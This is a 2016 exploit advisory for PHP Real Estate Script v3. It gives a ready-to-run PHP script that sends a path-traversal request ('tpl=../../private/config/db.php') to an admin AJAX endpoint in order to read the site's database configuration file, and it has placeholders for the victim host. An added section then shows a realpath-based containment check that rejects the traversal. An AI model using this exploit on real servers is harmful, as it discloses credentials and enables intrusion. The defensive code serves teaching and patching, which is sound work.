PHP Real Estate Script 3 Arbitrary File Disclosure
Posted on 09 July 2016
# Exploit Title: php Real Estate Script Arbitrary File Disclosure
# Date: 2016-07-08
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.realestatescript.eu/
# Version: v.3
# Download Link : http://www.realestatescript.eu/downloads/realestatescript-v3.zip

Exploit :

<?php
//read db config file
$post_data = 'tpl=../../private/config/db.php';//change read file path
$host = "www.server.local";//change victim address
$socket = fsockopen($host, 80, $errno, $errstr, 15);
if(!$socket){
    echo ' error: ' . $errno . ' ' . $errstr;
    die;
}else{
    //change [demo/en] path server
    $path = "/demo/en/";
    // HTTP header lines end with CRLF; a blank line separates headers from the body
    $http = "POST {$path}admin/ajax_cms/get_template_content/ HTTP/1.1\r\n";
    $http .= "Host: $host\r\n";
    $http .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $http .= "Content-length: " . strlen($post_data) . "\r\n";
    $http .= "Connection: close\r\n\r\n";
    $http .= $post_data . "\r\n\r\n";
    fwrite($socket, $http);
    $contents = "";
    while (!feof($socket)) {
        $contents .= fgets($socket, 4096);
    }
    fclose($socket);
    // print everything that follows the Content-Type response header
    $e = explode('Content-Type: text/html',$contents);
    print $e[1];
}
?>
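
A containment check for the `tpl` parameter abused above, as an added example that is not part of the original advisory or the vendor's code. It assumes the handler builds a file path from `tpl` relative to a template directory; the function name `resolve_template` and the directory layout are hypothetical and constructed for the demonstration.

```php
<?php
// Added example, not the vendor's code. Assumption: the handler reads a file
// whose path is built from the POSTed `tpl` value under a template directory.

/**
 * Resolve a requested template to a canonical path inside $baseDir.
 * Returns null when the request escapes the directory or the file is missing.
 */
function resolve_template(string $baseDir, string $tpl): ?string
{
    // Reject empty names, NUL bytes and absolute paths before touching the disk.
    if ($tpl === '' || strpos($tpl, "\0") !== false
        || $tpl[0] === '/' || $tpl[0] === '\\') {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "../" segments and follows symlinks, so the
    // comparison below is made on the path that would actually be opened.
    $real = realpath($base . DIRECTORY_SEPARATOR . $tpl);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Containment: canonical path must begin with "<base>/" (separator included,
    // so a sibling such as "templates_old" does not pass the prefix test).
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Constructed layout: a template directory two levels below private/config/db.php,
// mirroring the relative path used in the advisory's request body.
$root = sys_get_temp_dir() . '/res_demo_' . bin2hex(random_bytes(4));
mkdir("$root/app/templates", 0700, true);
mkdir("$root/private/config", 0700, true);
file_put_contents("$root/app/templates/home.tpl", "<h1>home</h1>");
file_put_contents("$root/private/config/db.php", "<?php // constructed placeholder");

$requests = ['home.tpl', '../../private/config/db.php', '/etc/passwd', 'missing.tpl'];
foreach ($requests as $tpl) {
    $path = resolve_template("$root/app/templates", $tpl);
    printf("%-30s => %s\n", $tpl, $path === null ? 'rejected' : 'allowed');
}
```

Only `home.tpl` resolves to a path; the traversal string from the advisory canonicalizes to a file outside the template directory and is rejected by the prefix comparison.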